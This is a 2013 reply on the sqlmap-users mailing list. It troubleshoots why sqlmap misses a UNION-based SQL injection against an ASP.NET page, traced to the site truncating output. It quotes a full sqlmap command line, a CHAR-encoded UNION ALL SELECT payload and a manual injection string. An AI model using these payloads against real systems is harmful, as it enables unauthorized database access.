Re: [sqlmap-users] A simple injection case failing
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] A simple injection case failing
|
From: Miroslav S. <mir...@gm...> - 2013-06-04 21:56:32
|
Hi. That site is trimming results (seems to do it to 14 chars in length). For example, request [#32]: ParamterOne=-4230' UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(106)+CHAR(117)+CHAR(103)+CHAR(58)+CHAR(75)+CHAR(108)+CHAR(101)+CHAR(113)+CHAR(75)+CHAR(89)+CHAR(67)+CHAR(120)+CHAR(113)+CHAR(116)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(114)+CHAR(58)-- &ParameterTwo=10,11,12,35,61 can be decoded to: ParamterOne=-4230' UNION ALL SELECT NULL,NULL,*:jug:KleqKYCxqt:hor:*-- &ParameterTwo=10,11,12,35,61 while in response there is: :jug:KleqKYCxq In this kind of cases you'll need to (at least try to) exploit it manually. Kind regards, Miroslav Stampar On Tue, Jun 4, 2013 at 10:47 AM, Stephen Shkardoon <ss...@ss...>wrote: > I have a case that sqlmap seems to be acting weird about. I've ran a > 'sqlmap.py -u "myhost.com/TestFile.aspx" > --data="ParameterOne=d&ParameterTwo=10,11,12,35,61" --dbms=mssql --hostname > --technique=U --union-cols=3 -v 6 --flush-session --fresh-queries -t > traffic_log.txt' > Manually injecting with ParameterOne looking like "foo' UNION SELECT 1,2,3 > -- " works as expected. In fact, in the log, you can see it working fine in > the case of request #32 and #36. However, sqlmap doesn't "find" this issue. > Most of the queries seem to be doing something like "foo) UNION" instead. > Is there a problem on my end here, or is sqlmap doing something weird or > what? > > Running sqlmap/1.0-dev-3e0f747 (latest git). > > Thanks, > Stephen > > > ------------------------------------------------------------------------------ > How ServiceNow helps IT people transform IT departments: > 1. A cloud service to automate IT design, transition and operations > 2. Dashboards that offer high-level views of enterprise services > 3. A single system of record for all IT processes > http://p.sf.net/sfu/servicenow-d2d-j > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
